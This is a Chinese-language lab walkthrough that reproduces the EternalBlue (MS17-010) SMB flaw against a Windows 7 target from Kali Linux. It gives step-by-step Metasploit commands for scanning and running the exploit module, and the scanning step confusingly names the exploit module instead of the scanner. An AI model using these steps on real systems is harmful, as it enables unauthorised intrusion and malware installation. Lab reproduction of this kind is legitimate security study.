永恒之蓝--漏洞复现.

1.永恒之蓝简介

        永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞，这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。                                                                                                                                 

2.环境准备

靶机：windows 7 （192.168.52.134)

攻击机：Kali Linux (192.168.52.129)

3.漏洞复现

用nmap扫描本网段下存活的主机

发现192.168.52.134，并且端口445目前是开启状态

使用kali自带的MSF的永恒之蓝漏洞模块，先对靶机进行扫描

打开MSF：msfconsole

 搜索永恒之蓝ms17-010代码：search ms17_010

auxiliary/scanner/smb/smb_ms17_010          是永恒之蓝扫描模块exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块

我们先对漏洞是否存在进行扫描                                                                                                      1.使用模块use exploit/windows/smb/ms17_010_eternalblue

2.设置靶机ip set rhosts 192.168.52.134

3.设置靶机端口 set rport 445（默认就是445）

4.输入show options查看配置

输入run开始操作

发现扫描结果信息（注：出现“+”号是存在的，“-”号是不存在，可能开启了防火墙或者已有补丁）

然后我们就可以利用漏洞，对靶机进行攻击

1.使用模块use exploit/windows/smb/ms17_010_eternalblue

2.设置靶机IP set rhosts 192.168.52.134

3.输入show options查看配置

 输入run开始攻击

 出现win就成功了，接下来我们就可以进行其他操作了